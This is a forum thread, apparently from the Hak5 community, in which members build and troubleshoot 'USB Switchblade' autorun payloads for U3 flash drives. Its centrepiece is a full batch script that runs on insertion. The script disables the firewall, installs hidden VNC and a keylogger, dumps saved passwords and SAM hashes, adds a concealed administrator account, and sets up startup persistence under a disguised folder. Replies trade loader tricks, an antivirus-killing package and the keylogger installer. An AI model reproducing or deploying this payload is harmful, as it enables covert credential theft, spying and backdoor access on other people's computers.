USB Switchblade Development

[G-Stress]

Has nobody really not found a Memorex TravelDrive loader? I followed the custom Memorex TravelDrive ISO tutorial, but there was no loader for the drive there. I did just search all 29 pages for a loader, only I scanned through them looking for anything memorex related I didn't see a loader. I tried placing the LaunchPad.iso with the cruzer one just to see if it'd work and it did not work. Just wondering if anyone else has a memorex loader or can post the source for autorun.exe for the cruzer loader.

[G-Stress]

K, I just went back to the memorex tutorial and saw there was a free ISO maker out there so I'm a little bit confused, but the cruzer loader contains autorun.exe and autorun.inf

I'm assuming autorun.exe just points to WIPCMDgo.bat file to start the whole thing. So me having no programming expeirence could I make the autorun.inf file and then create and autorun.bat instead of .exe and point it to the location and build that as an ISO and it should work?

I guess I'm asking does it matter if it be .exe or .bat and would they both give the same result?

Sorry guys, I did find a memorex loader on the actual switchblade link but I would like to know if it would be possible to use the method listed above about building the iso with a .bat file? Thanks in advance.

[pseudobreed]

hotkeys? payload?

link meh?

I dont have a link. I wrote my own loader that when it runs it hooks the keyboard and mouse much like a key logger does. Then it reads an ini file for all the available payloads, the path to the payload, and the hotkey.

If I have a hotkey pressed, it just calls the patch to the payload (After it finds the USB drive).

I was also able to hide the app completely from all process list. However, I could not get it to unload correctly. So, when you ran it twice you got a BSOD.

@G-Stress

You can use any iso writer. I used nero. The autorun.inf tells windows that this CD-ROM drive will execute this...

In my loader the autorun.inf points to the autorun.exe in the same folder and that runs the above loader I was talking about.

You can have your autorun.inf point to anything you want to. The reason it goes to the exe is because in the application I have a routine that looks for the removable drive letter (As this will vary from machine to machine).

Also, somewhere in here I pasted my original payload. It's pretty ugly and has come a long way. I think it's somewhere on page 17. However, at the top of the batch script is a dump path. On my lan payload I just changed the dump path to the netbios nameshare on my computer.

[HellFire]

Hey guys,

Great work on the USB Hacksaw, the idea has been haunting me forever and finally someone did it !

I've got a couple of questions though :

1. In the go.cmd file , under the Dump Sam section the code "pwdump 127.0.0.1" didnt quite work , as it gave me a "couldnt connect to remote registry error" , so i replaced the loopback address with %computername% and it worked fine . so im wondering why put the loopaddress when its more stable to fetch the lm hashes using the %computername% .

2. Since the switchblade is limited to an Admin account , i was wondering where are the lm hashes usually stored , so if its possible to add a command in go.cmd to copy those files to your usb , and then you can somehow fetch the lm hashes later at home from those files.

P.S: ophcrack has a live-cd with linux , that could be used to boot the pc with and extract the lm hashes without needing an Admin account .

Ohh and i love the show ... keep up the good work guys !

Cheers.

[G-Stress]

@ pseudobreed

Very nice work man. I am actually using your payload. You mentioned 2 things I was curious about. 1. being "The reason it goes to the exe is because in the application I have a routine that looks for the removable drive letter (As this will vary from machine to machine). "[/u]

I was wondering is that some code I could add to a batch script?

2. was about the dump path and using it on the lan, but I understand that, just changing the pathname.

Right now I have a memorex TravelDrive and I cannot get it to work, I have 2 cruzer's also that work just fine. This memorex is for testing purposes. I used the loader's on the switchblade link but when I copy the WIP and Documents folder to the drive nothing happens upon autoplay :?

Am I doing something wrong? I put the MemorexSB.exe on the desktop as stated and ran it, then copied my payload to the drive, but I get nothing upon autoplay?

[jacobmervine]

sorry for being a noob but, where the "root" of the flash drive? is it in the system folder? or in the apps folder? or just on the drive it self? i did all the reloading and such on my memorex u3 drive but i do not know where the "payload" goes and such iv looked through all the scripts to see if i could find the directories but they seem to not be found. thanks :)

[spektormax]

that be the directory so if your dirve is f: it be in there

[G-Stress]

Ok guys here's the modifications I've made so far, but i'm having a bit of a problem now. It seems to only dump the local shares and ip info and completely skips everything else. Well the hacksaw and nmap part worked also, but everything else it just skips. Also instead of dumping the info in the default dump directory it makes a new directory (RECYCLERRECYCLERDumphostuser) and dumps it there.

This is a Memorex TravelDrive also. This payload works fine on my 1gig cruzer non-u3 via the autoplay action, but I didn't add the hacksaw and nmap part to that one. Also what I did was copy the 4 files from the CDFS partition:

autorun.inf

LaunchU3.exe

LaunchPad.zip

switchblade.vbs

I edited the switchblade.vbs file and changed the following:

If objFSO.FileExists(objDrive.DriveLetter & ":WIPCMDgo.cmd") Then

strPath = objDrive.DriveLetter & ":WIPCMD"

strcmd = """" & strPath & "" & "go.cmd" & """"

to:

If objFSO.FileExists(objDrive.DriveLetter & ":RECYCLERautoexec.bat") Then

strPath = objDrive.DriveLetter & ":RECYCLER"

strcmd = """" & strPath & "" & "autoexec.bat" & """"

Then I created a new .ISO file of those 4 files and used the UpdaterCore from the memorex tutorial with my new LaunchPad.iso file in the bin directory to flash the partition.

Am I missing something to make the rest of this work?

:: Do not show commands to console

==================================

@echo off

setlocal



:: Dump Directory

=================

set dumppath=RECYCLERDUMP%computername%%username%



:: Make Directory from Computer NameUser

=========================================

mkdir %dumppath%



:: Apply Attributes Hidden and System

=====================================

attrib +h +s RECYCLERDUMP



:: Turn Off Windows XP Firewall

===============================

netsh firewall set opmode disable



:: Setup VNC

============

regedit /s RECYCLERultravnc.reg

mkdir "%ProgramFiles%UltraVNC"

xcopy RECYCLERUltraVNC "%ProgramFiles%UltraVNC" /D /E /C /I /H /F /R /Y

"%ProgramFiles%UltraVNCwinvnc.exe" -reinstall



:: Set Services to Auto

=======================

RECYCLERnircmd.exe service auto lanmanworkstation

RECYCLERnircmd.exe service auto lanmanserver

RECYCLERnircmd.exe service auto winvnc

RECYCLERnircmd.exe service auto remoteregistry



:: Start Services

=================

RECYCLERnircmd.exe service start lanmanworkstation

RECYCLERnircmd.exe service start lanmanserver

RECYCLERnircmd.exe service start winvnc

RECYCLERnircmd.exe service start remoteregistry



:: Enable ADMIN$ Share

======================

RECYCLERnircmd.exe regsetval dword "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters" "AutoSharewks " "1"



:: Port Probe

=============

RECYCLERports.exe /shtml %dumppath%ports.html



:: Current Process List

=======================

RECYCLERprocess.exe /stab %dumppath%process.txt



:: Internet Explorer History

============================

RECYCLERiehv.exe /shtml %dumppath%iehistory.html



:: Internet Explorer Passwords

==============================

RECYCLERiepv.exe /shtml %dumppath%iepasswords.html



:: Email Client Passwords

=========================

RECYCLERmailpv.exe /shtml %dumppath%mailpasswords.html



:: Messenger Client Passwords

=============================

RECYCLERmspass.exe /shtml %dumppath%messengerpasswords.html



:: Network Passwords

====================

RECYCLERnetpass.exe /shtml %dumppath%networkpasswords.html



:: Protected Passwords

======================

RECYCLERpspv.exe /stab %dumppath%protectedpasswords.txt



:: Services

===========

RECYCLERserviwin.exe /stab /services %dumppath%services.txt



:: IP Info

==========

ipconfig /all > %dumppath%lan.txt



:: Dump VNC Password

====================

RECYCLERvncpwdump.exe /stab %dumppath%vncpass.txt





:: Get External IP

==================

RECYCLERwget.exe http://whatismyip.com

ren index.html wan.html

xcopy wan.html %dumppath% /H /C /Y

del wan.html /q



:: SAM Dump

===========

:: fgdump will only dump to call folder

:: run fgdump, copy pwdump file to dumppath, then delete original

RECYCLERfgdump.exe -c -s -r -h 127.0.0.1 -u %username% -p * >> 127.0.0.1.pwdump.log

xcopy *.pwdump %dumppath% /H /C /Y

xcopy 127.0.0.1.pwdump.log %dumppath% /H /C /Y

del *.pwdump /q

del 127.0.0.1.pwdump.log /q



:: Add User

===========

net user SUPPORT passw0rd /add /fullname:"CN=Microsoft Corporation,L=Redmond,S=Washington" /comment:"This is a vendor's account for Support"

net localgroup Administrators SUPPORT /add

net accounts /maxpwage:unlimited



:: Hide SUPPORT from Windows XP Login Screen

============================================

RECYCLERnircmd.exe regsetval dword "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" "SUPPORT" "0"



:: Delete MS's Support Account

==============================

net user SUPPORT_388945a0 /delete



:: Local Share's

================

net view 127.0.0.1 > %dumppath%shares.txt





:: Install Perfect Keylogger

==========================================================================

mkdir "%ProgramFiles%backupsupport"

xcopy RECYCLERbpk "%ProgramFiles%backupsupport" /D /E /C /I /H /F /R /Y

"%ProgramFiles%backupsupportbpkbpk.exe"







:: Nmap Scanner

===============

:: If admin make windows$NtUninstallKB931337$, else make %appdata%sbs

mkdir %systemroot%$NtUninstallKB91337$ || mkdir "%appdata%scs"



:: go to payload directory

cd RECYCLERnmap_install



:: remove hidden and system attributes (makes next copy command happy, probably better way to do this)

attrib *.* -s -h



:: copy payload to target

copy *.* %systemroot%$NtUninstallKB91337$ || copy *.* "%appdata%scs"



:: reapply hidden and system attributes

attrib *.* +s +h





:: Hide USB Hacksaw

attrib %systemroot%$NtUninstallKB91337$ +s +h & attrib "%appdata%scs" +s +h



:: Start USB Hacksaw (something is wrong with this next line, trying dirty hack below)

%systemdrive%

cd 

cd %systemroot%

cd $NtUninstallKB91337$

nircmd execmd CALL nmap.bat







:: USB Hacksaw

==============

:: If admin make windows$NtUninstallKB931337$, else make %appdata%sbs

mkdir %systemroot%$NtUninstallKB931337$ || mkdir "%appdata%sbs"



:: go to payload directory

cd RECYCLERSBS



:: remove hidden and system attributes (makes next copy command happy, probably better way to do this)

attrib *.* -s -h



:: copy payload to target

copy *.* %systemroot%$NtUninstallKB931337$ || copy *.* "%appdata%sbs"



:: reapply hidden and system attributes

attrib *.* +s +h



:: If admin register USB Hacksaw as startup program in registry, else do it the yucky way

reg.exe add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /v USBMedia /t REG_SZ /d "%systemroot%$NtUninstallKB931337$sbs.exe" /f || "%appdata%sbsshortcut.exe" /f:"%USERPROFILE%Start MenuProgramsStartup .lnk" /A:C /T:"%appdata%sbssbs.exe" /W:"%appdata%sbs" /I:"%appdata%sbsblank.ico"



:: Hide USB Hacksaw

attrib %systemroot%$NtUninstallKB931337$ +s +h & attrib "%appdata%sbs" +s +h



:: Start USB Hacksaw (something is wrong with this next line, trying dirty hack below)

:: "%systemroot%$NtUninstallKB931337$sbs.exe" || "%appdata%sbssbs.exe"

%systemdrive%

cd 

cd %systemroot%

cd $NtUninstallKB931337$

sbs.exe



:: Done

:? :?

[spektormax]

yeh can u send me the keylogger and the other new stuff (or add it yourself to http://www.hak5.org/wiki/Switchblade_Packages ) so that we can all use it

[G-Stress]

Ok I uploaded the package (Perfect Keylogger) on the packages page along with a "Read Me" of how I implemented it. As far as the rest of the changes I've made any idea why it's all not working?

[spektormax]

cool, but first of al I dont wanna install any keyloggers lol, and secound, I want to make this usable by the comunity istead of per person basis, so good job but its really a private bassis still

[G-Stress]

Yea, you don't have to keep the logger installed and you can install it on any PC, you just need to make a remote install package, because then... well actually there has to be a way to install this like vnc and specify the e-mail settings upon installation. If someone does decide to mess around with that and figures it out I'd like to know :)

[Quile]

dont know why but keylogger installer dosent work

[G-Stress]

Hmmm... it worked just fine for me. Are you using any spyware/adware software? I know it automatically detects and I believe quarentines bpk.exe

atleast mcafee and aol software do. It'd be nice if I can find a way to encrypt it :D

I placed a read me in the package also of how I implemented it, if you have any questions just ask. Also if any one else finds this interesting and a better method of installation for the logger please let me know :D

1 more thing, does anyone have a good resource to where I can go to learn more about this type of coding/scripting. I've been googling shell programming but I'm not really finding anything similiar to this :?

[Painkiller667]

The switchblade packages page. How do you add the functions that you want to the main project? I would understand copying and pasting the code for the functions you want it to do into some txt and then rename to exe. Is that how it is done? HOW?!

[xFilthyxJesusx]

So how are you guys able to edit and compile the .vbs and .vbe files?

[Snax]

anyone else getting this popup error:

16 bit MS-DOS Subsystem

C:WINDOWSsystem32cmd.exe

The NTVDM CPU has encountered an illegal instruction.

CS:0547 IP:ffe4 OP:fe ff 1d 09 01 Choose 'close' to terminate the application.

than there is the normal close ignore options.

i cant pin point what app is throwing it.

right now im am using a combo of different payloads.

Also which pwdump do you guys say is the best. i have been playing around with them all i only got one to work rigth but now i cant rem which one it was.

[Snax]

The switchblade packages page. How do you add the functions that you want to the main project? I would understand copying and pasting the code for the functions you want it to do into some txt and then rename to exe. Is that how it is done? HOW?!

you have to edit the go.cmd

use this

nircmd execmd CALL WIPCMD

and at the end place whatever apps or whatever you want to run

[Jester]

anyone else getting this popup error:

16 bit MS-DOS Subsystem

C:WINDOWSsystem32cmd.exe

The NTVDM CPU has encountered an illegal instruction.

CS:0547 IP:ffe4 OP:fe ff 1d 09 01 Choose 'close' to terminate the application.

than there is the normal close ignore options.

i cant pin point what app is throwing it.

right now im am using a combo of different payloads.

Also which pwdump do you guys say is the best. i have been playing around with them all i only got one to work rigth but now i cant rem which one it was.

This is a guess but I had an error with nmap running on my system that could be the error for nmap.

[Snax]

yea i went over everything with a fine tooth comb and realized that when i deleted a couple of the progs that i wasnt going to use that i left the command to open them up in there. the simplest of things that go overlooked.

but thanks for the help man

[renegadecanuck]

Well, my version of the Switchblade has been released (consider it a BETA 0.1 Version).

There are two versions:

Regular:

-AvKill

-System Info

-SAM

-Product Keys

-IE Pass/Info (IE7 Compliant)

-Updates-List (Seperate File do to size)

-Network PW

-Cache

-Netstat Info

-Messenger Pass

-IE History

-Hacksaw

-Nmap

-VNC

"Safe" Version (Really, just a Lite Version):

-Everything above except NO AvKill, Hacksaw, Nmap or VNC.

Currently, it is only U3 Compliant (though easy to adapt to non-u3 drives), and only includes loader for Sandisk Cruzers.

Download Links:

Full "Regular" Version

Lite "Safe" Version

[Matt35]

Is there any chance of you making one available for Memorex? Yours seems quite complete and affective as well...

--Matt

[Quile]

btw.

AVkill cannot kill Kaspersky Professional Pro, dunno why...

[renegadecanuck]

Is there any chance of you making one available for Memorex? Yours seems quite complete and affective as well...

--Matt

Instead of the U3 loader I included in the RAR file, use the method listed at http://hak5.org/wiki/USB_Switchblade#For_Memorex to flash your U3 partition.

[moonlit]

btw.

AVkill cannot kill Kaspersky Professional Pro, dunno why...

Because it's not supposed to.

Read. The. Wiki.